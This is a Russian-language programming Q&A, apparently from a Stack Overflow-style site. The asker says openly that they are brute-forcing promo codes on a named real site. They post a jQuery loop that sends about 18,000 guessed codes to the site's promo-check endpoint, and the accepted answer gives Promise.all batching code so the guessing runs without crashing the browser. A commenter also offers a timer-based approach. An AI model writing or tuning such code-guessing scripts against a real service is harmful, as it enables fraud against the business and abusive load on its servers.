# Браузер падает при большом количестве запросов к серверу

Tags: javascript, jquery

Как сделать, чтобы браузер не падал при arr, состоящим из 18000 7-ми символьных строк? Например, дожидался, пока придёт одна пачка из 20 запросов, потом вторая, а не просто по фасту наполнить память одними исходящими запросами.

Это брутфорсер для промокодов на одном сайте, я нашёл одну закономерность и пытаюсь эксплуатировать.

```js
for(let testword of arr){
    $.getJSON('https://client.iqmining.com/promocheck', {promocode: testword, life: "y1"}, function(data){
        if (data.discount > 0){
            console.log(data.discount);
            console.log(testword);
        }
    });
}
```

Comment: Интересно, почему же ложится.. (сарказм). Если уж прям так надо, засуньте всё в "цикличный таймер" и запускайте раз в n-ое кол-во времени, по те же `20 запросов`. Ну или переделайте `for`, в тот же, "цикличный таймер" с интервалом, хотя бы в секунду, процу уже проще будет обрабатывать..

Answer (score 1, accepted):

Можно сделать с помосщью [`Promise`](https://developer.mozilla.org/ru/docs/Web/JavaScript/Reference/Global_Objects/Promise) и [`Promise.all`](https://developer.mozilla.org/ru/docs/Web/JavaScript/Reference/Global_Objects/Promise/all)

Рботает как просили, отправляем запросы пачками по 5, ждем пока пачка отработает полностью(`Promise.all`) и запускаем следующую и так пока не закончатся запросы.

Примерно так :

```js
const all = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20],
  packageCount = 5;
completeAll(all, packageCount);

function createPromise(a, i) {
  return new Promise(function(resolve, reject) {
    setTimeout(() => {
      console.log(a);
      resolve(a);
    }, 250 * i);
  });
}

function completeAll(arr, pkgCnt) {
  let tmpArr = [...arr],
    promises = [];

  for (let i = 0; i < pkgCnt; i++) {
    if (tmpArr.length === 0) break;
    promises.push(createPromise(arr[i], i));
    tmpArr.shift();
  }

  Promise.all(promises).then(values => {
    console.log('package completed');
    if (tmpArr.length > 0)
      completeAll(tmpArr, pkgCnt);
  });
}
```

ПС : важно учитывать следующее

> Если одно из переданных обещаний будет отклонено, Promise.all будет немедлено отклонен со значением отклоненного обещания, не учитывая другие обещания

Как выход с етой проблемы в вашем случаи предлагаю просто резолвить промисы в любом случаи, не важно успешен запрос или нет, а потом просто анализировать результаты.